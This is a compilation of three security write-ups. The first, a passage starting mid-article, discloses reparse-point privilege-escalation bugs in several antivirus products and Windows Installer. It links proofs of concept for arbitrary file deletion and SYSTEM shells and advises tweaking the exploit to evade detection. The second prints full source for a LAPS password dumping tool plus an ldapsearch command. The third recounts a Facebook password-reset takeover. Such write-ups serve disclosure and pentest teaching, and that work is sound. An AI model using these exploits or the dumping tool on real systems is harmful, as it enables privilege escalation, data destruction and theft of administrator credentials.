Chaining it together, I’ve an exploit which demonstrate the bug, first a directory in C:\updmgr will be created and then you should manually move it to C:\ProgramData\McAfee\Update an opportunistic lock will trigger the poc to create a reparse point to the target as soon as the AV GUI attempt to move the folder, the poc will set it to reparse point and will lock the moved directory so it will prevent the reparse point deletion.

PoC can be found here

Avira Antivirus

 I’m gonna do the tests on Avira Prime, not gonna lie Avira has the easiest way to download their antivirus. Not like other vendors they crack your head before they give the trial, I really feel bad for disclosing this bug

Anyway it look like there’s a feature come with Avira Prime called Avira System Speedup Pro, I can’t still explain why this behaviour exist in Avira System Speedup feature but yeah it exist.

When starting the Avira System Speedup Pro GUI there’s an initialization done by the service “Avira.SystemSpeedup.Service.exe” which is written in C# which make it easier to reverse the service but I reversed the service and things just doesn’t make any sense so I guess it’s better to show process monitor output to understand the issue.

 When opening the GUI I assume that there’s an RPC communication between the GUI and the service to make the required initialization in order to serve the user needs. While the service begin the initialization process it will create and remove a directory in C:\Windows\Temp\Avira.SystemSpeedup.Service.madExcept

without even checking for reparse point. It’s extremely easy to abuse the issue.

This time instead of writing a c++ PoC I’ll be writing a simpler one as a batch script. The PoC in this case doesn’t need any user interaction, and will delete the targeted directory subcontent.

PoC can be found here

1    Trend Micro Maximum security

 One of the best AV’s I’ve ever seen, but unluckily this disclosure include this antivirus to the black list.

I already discovered an issue in trend micro and it was patched in CVE-2020-25775, I literally just found a high severity issue on trend micro. But I was contracted for so I can’t disclose it here.

Moving out, as other AV’s there’s a PC Health Checkup feature, it probably worth our attention.

While browsing trough the component, I noticed that there’s a feature “Clean Privacy Data” feature.

I clicked on MS Edge and cleaned, the output from process monitor was:

And as you see Trend Micro Platinum Host Service is deleting a directory in a user write-able location without proper check against reparse point while running as “NT AUTHORITY\SYSTEM” which is easily abuse-able by a user to delete arbitrary files.

There’s nothing to say more, I created a proof of concept as a batch script after running it expect the target directory subcontent to be deleted.

PoC can be found here

MalwareBytes

 Yup, another good AV, Already engaged with the antivirus and as usual I got a bug. 5 months has passed since I reported the bug, they still didn’t patched the issue and since they paid the bounty, I can’t disclose the bug but as usual PAPA has candies for you !

I will using the same technique explained above to bypass the self protection.

While checking for updates, the antivirus look for a non existing directory

Hmmmm, let’s take a look

The pic shown above, show us that Malwarebytes antivirus engine is deleting every subcontent of C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate\test.txt.txt and since there’s no impersonation of the user and literally no proper check against reparse point we can probably abuse that, by creating a directory there and creating a reparse point inside  C:\ProgramData\Malwarebytes\MBAMService\ctlrupdate we can redirect the file deletion to an arbitrary location.

The PoC can be found here

1    Kaspersky

The AV which I engaged with the most, about 11 bugs were reported and 3 of them were fixed.

For the moment I will be talking about a bug which I already disclosed here, this PoC will spawn a SYSTEM shell as soon as it succeed, the bug seems to be still existing on Kaspersky Total Security with December 2020 latest security patches, the only issue you will have is the AV will detect the exploit as a malware, you must do some modification to prevent your exploit from being deleting. Let’s I can confirm that the issue still exist.

One more thing

Another issue I discovered in all Kaspersky’s antiviruses which allow arbitrary file overwrite without user interaction. I’ve already reported the bug to Kaspersky but they didn’t gave me a bug bounty

They said that the issue isn’t eligible for bug bounty because the reproduction of the issue is unstable, ain’t gonna lie I gave them a horrible proof of concept but still do the job so I guess it should be rewarded and since they wrote that they gave bounties. I won’t give bugs for free like a foo.

So let’s dive inside the bug, when any user start Mozilla Firefox, Kaspersky write a special in %Firefox_Dir%\defaults\pref while not impersonating the user or not even doing proper links check, if abused correctly it can be used against the AV to trigger arbitrary file overwrite on-demand without user interaction.

A proof of concept is attached implement the issue, I’ve rewritten a new one which will trigger your needs on demand thanks me later.

PoC can be found here

Windows

 I was about to disclose bugs in Eset and Bitdefender but I don’t have time to write more, so here’s the last one.

First, if you’re not familiar with windows installer CVE-2020-16902, it’s literally the 6th time I am bypassing the security patch and they still don’t hire security researchers. I will be using the same package as CVE-2020-16902

Microsoft has patched the issues by checking if c:\config.msi exist, if not it will be used to generate rollback directory otherwise if it exist c:\windows\installer\config.msi will be used as a folder to generate rollback files.

A tweet by sandboxescaper mentioned that if a registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” existed when the installation begin, the windows installer will use c:\config.msi as a directory rollback files. As an unprivileged user I guess there’s no way to prevent the deletion or create “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi”

And as usual there’s always something that worth our attention.

When the directory is deleted, there’s an additional check if the directory exist or not. Which is kinda strange, since the RemoveDirectory returned TRUE

I guess there’s no need to make additional checks. I am pretty sure that there’s a bug there, I managed to create the directory as soon the installer delete and this happened

The installer did a check if the directory exist and it return that the directory exist, so the windows installer won’t delete the registry key  “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” because the directory wasn’t delete.

In the next installation the C:\Config.Msi will be used to save rollback files on it, which can be easily abused (I’ve already done that in CVE-2020-1302 and CVE-2020-16902).

I’ve provided a PoC as c++ project to exploit the issue, it’s a double click to SYSTEM shell, thank me later again.

PoC can be found hereNote: I am not responsible for any usage for those disclosures, you’re on your own.

Dumping LAPS Passwords from Linux

Original text by N00PY

Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux.  I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host, and one being from a “dropbox” typically running Kali Linux or similar OS.  The former being more popular on “red team” type engagements, and the latter more for traditional internal penetration testing.  As a penetration tester who works primarily off of a Linux host, I prefer to use tooling native to my own system.

Today’s topic is about how to dump LAPS passwords from Linux.  If you have not yet heard of LAPS, it is Microsoft’s solution to the problem of local administrator password re-use. Before LAPS, administrators would typically set the RID 500 account password to the same value on every computer.  This was so that they could access a machine in the event that domain authentication was not available or desired. One password was used for all systems as it wasn’t practical or simple to manage that many unique passwords.  This of course was then exploited by penetration testers for decades, as they could compromise a single host, dump the RID 500 password hash, and use it to authenticate to any computer on the domain via the local admin account.

The way LAPS works is relatively simple.  A client side component on each computer generates a random password.  The password gets stored in Active Directory, in an attribute of the computer object.  Only Domain Admins are able to view the value of the attribute.  The client generates a new password every so often as determined by the configuration and updates Active Directory with the new password and the expiration time.

Like most Active Directory issues, the problems stem from misconfigurations.  Typically users who are not in the Domain Admins group will need local admin access to systems, such as helpdesk personnel.  Because of this, the ability to read LAPS passwords for computer objects will be delegated to other groups beyond just the Domain Admins group.  This may be all computer objects or just objects within a certain OU.  Over time, this privilege will often be granted to groups that it should not have been.  Also, if an account or group has ownership over a computer object, they can modify permissions on the system to be able to view the password.

Personally I’ve seen multiple cases in which regular domain users are able to read LAPS passwords, either just for a few systems or 50+ within the domain.

If you have the permissions, reading this attribute is easy by using the PowerShell Get-AdmPwdPassword cmdlet. The objective of this post however is to describe how to do this without needing any access to a Windows host.

To do this from Linux, you can use LAPSDumper.  This is available on Github, but I’ll also paste the full source here as the code is quite simple.

#!/usr/bin/env python3
from
ldap3
import
ALL
, Server, Connection, NTLM, extend, SUBTREE
import
argparse
parser
=
argparse.ArgumentParser(description
=
'Dump LAPS Passwords'
)
parser.add_argument(
'-u'
,
'--username'
,
help
=
'username for LDAP'
, required
=
True
)
parser.add_argument(
'-p'
,
'--password'
,
help
=
'password for LDAP (or LM:NT hash)'
,required
=
True
)
parser.add_argument(
'-l'
,
'--ldapserver'
,
help
=
'LDAP server (or domain)'
, required
=
False
)
parser.add_argument(
'-d'
,
'--domain'
,
help
=
'Domain'
, required
=
True
)
def
base_creator(domain):
search_base
=
""
base
=
domain.split(
"."
)
for
b
in
base:
search_base
+
=
"DC="
+
b
+
","
return
search_base[:
-
1
]
def
main():
args
=
parser.parse_args()
if
args.ldapserver:
s
=
Server(args.ldapserver, get_info
=
ALL
)
else
:
s
=
Server(args.domain, get_info
=
ALL
)
c
=
Connection(s, user
=
args.domain
+
"\"
+
args.username, password
=
args.password, authentication
=
NTLM, auto_bind
=
True
)
c.search(search_base
=
base_creator(args.domain), search_filter
=
'(&(objectCategory=computer)(ms-MCS-AdmPwd=*))'
,attributes
=
[
'ms-MCS-AdmPwd'
,
'SAMAccountname'
])
for
entry
in
c.entries:
print
(
str
(entry[
'sAMAccountName'
])
+
":"
+
str
(entry[
'ms-Mcs-AdmPwd'
]))
if
__name__
=
=
"__main__"
:
main()

This tool will pull every LAPS password the account has access to read within the entire domain.  The usage is simple, and the syntax mirrors that of other popular tools.  It is also pass the hash (PtH) compatible.

1234567891011
$ python laps.py -u user -p password -d domain.local
 
COMPUTER01$:B#g4%aI$K!yZ)q}
COMPUTER02$:n-6pW-n8L!o8Of]
COMPUTER03$:u2Oc9z&{R)fHA2J
COMPUTER04$:Rwb2#4,{@N4Y19v
COMPUTER05$:17aZ,+1L5L((D0F
COMPUTER06$:DNX&@e.8XTQhyPj
COMPUTER07$:U3ZXf0vX!Xm1P89
COMPUTER08$:.6IvTd7-85ytJeF
COMPUTER09$:P2(VSN4%49!%fI8

This will dump the computer name and the password for the local administrator account delimited with a colon.  A simple modification of line 27 can allow you to dump it formatted however you please.

Additional reading on LAPS:

Update Dec 20, 2020

I forgot to mention, this is also simple to do from ldapsearch, using this syntax or similar:

1
ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd

One thing I wanted to add however is the ability to pass the hash. PtH is particularly useful when you dump an IT admin hash that won’t crack, or a when using a compromised machine account.  If you have a plaintext password for the user, ldapsearch works just as well.

How I hacked Facebook: Part One

How I hacked Facebook: Part One

Original text by Alaa Abdulridha

We’ve been in this pandemic since March and once the pandemic started I was having plenty of free time, And I need to use that time wisely, So I’ve decided to take the OSWE certification and I finished the exam on 8 of August, after that, I took a couple of weeks to recover from the OSWE exam, then in the med of September, I said you know what? I did not register my name in the Facebook hall of fame for 2020 as I do every year. okay, let’s do it.

I never found a vulnerability on one of Facebook subdomains, and I took a look at some writeups and I saw one writeup in one of Facebook subdomains which got all my attention It was a great write up you can check it out [HTML to PDF converter bug leads to RCE in Facebook server.]

So after reading this write-up now I took a good idea about how many vulnerabilities I could find in such a huge web app.

So my main target was https://legal.tapprd.thefacebook.com and my goal was RCE or something similar.

I ran some fuzzing tools just to get the full endpoints of this web app and I took a 2 hours nap and watched a movie, Then I got back to see the results okay I got some good results.

Dirs found with a 403 response:

Dirs found with a 403 response:/tapprd/
/tapprd/content/
/tapprd/services/
/tapprd/Content/
/tapprd/api/
/tapprd/Services/
/tapprd/temp/
/tapprd/logs/
/tapprd/logs/portal/
/tapprd/logs/api/
/tapprd/certificates/
/tapprd/logs/auth/
/tapprd/logs/Portal/
/tapprd/API/
/tapprd/webroot/
/tapprd/logs/API/
/tapprd/certificates/sso/
/tapprd/callback/
/tapprd/logs/callback/
/tapprd/Webroot/
/tapprd/certificates/dkim/
/tapprd/SERVICES/

Okay, I think this result is very enough to support my previous theory about how huge this application, Then I started to read the javascript files to see how the website works and what methods it uses ..etc

I noticed a way to bypass the redirection into the Login SSO, https://legal.tapprd.thefacebook.com/tapprd/portal/authentication/login and after analyzing the login page, I noticed this endpoint

/tapprd/auth/identity/user/forgotpassword

and after doing some fuzzing on the user endpoint I’ve noticed another endpoint which its /savepassword and it was expecting a POST request, Then after reading the javascript files I knew how the page work, there should be a generated token and xsrf token.. etc The idea that first came to me okay, Lets test it and see if it will work I tried to change manually using burp suite but I got an error, the error was execution this operation failed.

I said okay, this might be because the email is wrong or something? let’s get an admin email, Then I started to put random emails in a list to make a wordlist and after that, I used the intruder and I said let’s see what will happen.

I got back after a couple of hours I found the same error results plus one other result, This one was 302 redirect to the login page, I said wow, I’ll be damned if this worked Haha.

So let’s get back to see what I’ve done here, I sent random requests using intruder with a CSRF token and random emails with a new password to this endpoint /savepassword

and one of the results was 302 redirect.

Image for post

Now I went to the login page and I put the login email and the new password and BOOM I logged in Successfully into the application and I can enter the admin panel 🙂

Image for post

I read the hacker report who found RCE before using the PDF and they gave him a reward of 1000$ only so I said okay, let’s make a good Impact here and a perfect exploit.

I wrote a quick and simple script to exploit this vulnerability with python you put the email and the new password and the script will change the password.

Image for post

The Impact here was so high because the Facebook workers used to login with their workplace accounts, Which mean they’re using their Facebook accounts access token, and maybe if another attacker wanted to exploit this it might give him the ability to gain access to some Facebook workers accounts .. etc

Then I reported the vulnerability and the report triaged.

And on 2 of October, I received a bounty of 7500$

Image for post

I enjoyed exploiting this vulnerability so much, so I said that’s not enough, this is a weak script! let’s dig more and more.

And I found two more vulnerabilities on the same application, But we will talk about the other vulnerabilities in the Part two writeup 🙂

You can read the write-up on my website : https://alaa.blog/2020/12/how-i-hacked-facebook-part-one/

And you can follow me on twitter : https://twitter.com/alaa0x2

Cheers.